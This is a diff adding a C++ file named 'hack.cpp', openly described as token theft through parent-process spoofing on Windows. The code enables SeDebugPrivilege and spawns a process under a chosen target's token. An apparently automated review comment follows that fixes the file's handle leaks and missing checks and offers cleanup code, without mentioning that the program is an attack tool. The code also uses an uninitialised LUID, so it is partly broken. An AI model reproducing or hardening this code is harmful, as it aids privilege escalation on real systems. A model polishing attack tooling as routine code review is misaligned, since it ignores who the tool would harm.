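--- /dev/null
+++ b/hack.cpp
@@ -0,0 +1,58 @@
+/*
+hack.cpp
+token theft via
+UpdateProcThreadAttribute
+author: @cocomelonc
+https://cocomelonc.github.io/malware/2022/10/28/token-theft-2.html
+*/
+#include <windows.h>
+#include <stdio.h>
+#include <iostream>
+
+// set privilege
+BOOL setPrivilege(LPCTSTR priv) {
+HANDLE token;
+TOKEN_PRIVILEGES tp;
+LUID luid;
+BOOL res = TRUE;
+
+tp.PrivilegeCount = 1;
+tp.Privileges[0].Luid = luid;
+tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
+
+if (!LookupPrivilegeValue(NULL, priv, &luid)) res = FALSE;
+if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &token)) res = FALSE;
+if (!AdjustTokenPrivileges(token, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL)) res = FALSE;
+printf(res ? "successfully enable %s :)\n" : "failed to enable %s :(\n", priv);
+return res;
+}
+
+// create process
+BOOL createProcess(DWORD pid, LPCWSTR app) {
+STARTUPINFOEXW si;
+PROCESS_INFORMATION pi;
+SIZE_T size;
+BOOL res = TRUE;
+HANDLE ph = OpenProcess(PROCESS_CREATE_PROCESS, false, pid);
+printf(ph ? "successfully open process :)\n" : "failed to open process :(\n");
+
+ZeroMemory(&si, sizeof(STARTUPINFOEXW));
+ZeroMemory(&pi, sizeof(PROCESS_INFORMATION));
+InitializeProcThreadAttributeList(NULL, 1, 0, &size);
+si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, size);
+InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size);
+UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &ph, sizeof(HANDLE), NULL, NULL);
+si.StartupInfo.cb = sizeof(STARTUPINFOEXW);
+
+res = CreateProcessW(app, NULL, NULL, NULL, true, EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, NULL, NULL, (LPSTARTUPINFOW)&si, &pi);
+printf(res ? "successfully create process :)\n" : "failed to create process :(\n");
+return res;
+}
+
+int main(int argc, char** argv) {
+if (!setPrivilege(SE_DEBUG_NAME)) return -1;
+DWORD pid = atoi(argv[1]);
+if (!createProcess(pid, L"C:\\Windows\\System32\\mspaint.exe")) return -1;
+return 0;
+}
+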
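Review bot: Every kernel handle this file acquires is leaked: `token` in setPrivilege and `ph`, `pi.hProcess` and `pi.hThread` in createProcess are never passed to `CloseHandle`, and the attribute list returned by `HeapAlloc` is never released with `DeleteProcThreadAttributeList` and `HeapFree`. The results of `OpenProcess` and `HeapAlloc` are only printed, not acted on, so a NULL `ph` or NULL `si.lpAttributeList` still flows into `InitializeProcThreadAttributeList` and `UpdateProcThreadAttribute`; returning FALSE right after the failed call is the usual guard. In main, `argv[1]` is read without checking `argc`, so running the binary with no argument dereferences a null pointer — `if (argc < 2) return -1;` before the `atoi` call. The cleanup tail for createProcess would look like the excerpt below; setPrivilege needs the same `CloseHandle(token)` before its return.
```cpp
BOOL createProcess(DWORD pid, LPCWSTR app) {
    // … unchanged: OpenProcess, attribute-list setup, CreateProcessW, status printf …
    if (pi.hProcess) CloseHandle(pi.hProcess);
    if (pi.hThread) CloseHandle(pi.hThread);
    if (si.lpAttributeList) {
        DeleteProcThreadAttributeList(si.lpAttributeList);
        HeapFree(GetProcessHeap(), 0, si.lpAttributeList);
    }
    if (ph) CloseHandle(ph);
    return res;
}
```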